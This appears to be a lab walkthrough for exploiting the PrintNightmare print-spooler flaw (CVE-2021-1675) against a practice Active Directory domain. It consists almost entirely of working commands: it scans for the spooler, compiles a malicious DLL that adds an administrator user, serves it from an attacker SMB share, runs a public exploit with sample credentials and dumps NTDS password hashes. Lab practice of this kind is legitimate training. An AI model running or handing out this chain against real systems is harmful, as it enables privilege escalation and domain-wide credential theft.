Check spooler is active
cme smb 192.168.56.10-23 -M spooler
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
Get-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint' | Select-Object RestrictDriverInstallationToAdministrators
A vulnerable Point and Print configuration would be as follows.
- The setting
RestrictDriverInstallationToAdministratorsis set to0, so that users can install printer drivers. - The setting
NoWarningNoElevationOnInstallis set to1, so that no elevation prompt is shown when installing a printer driver.
Prepare Dll
/opt/Tools/active-directory/printnightmare/nightmare.c
When the user is not added to administrator group usually in windows server 2019 and above
/opt/Tools/active-directory/printnightmare/adduser.c
Compile the source code file
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.cx86_64-w64-mingw32-gcc -shared -o pnightmare2.dll adduser.c -lnetapi32Exploit
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare
/opt/Tools/active-directory/printnightmare
Start the smbserver to serve the dll file
smbserver.py -smb2support ATTACKERSHARE .
execute the exploit for old
python3 CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.56.1\ATTACKERSHARE\nightmare.dll'
reexecute the adduser for new server
python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@winterfell.north.sevenkingdoms.local '\\192.168.56.1\ATTACKERSHARE\pnightmare2.dll'Get the loot
cme smb winterfell.north.sevenkingdoms.local -u pnightmare2 -p 'Test123456789!' --ntds
Cleanup
- After the exploitation you will find your dlls inside :
C:\Windows\System32\spool\drivers\x64\3 - And also inside :
C:\Windows\System32\spool\drivers\x64\3\Old\{id}\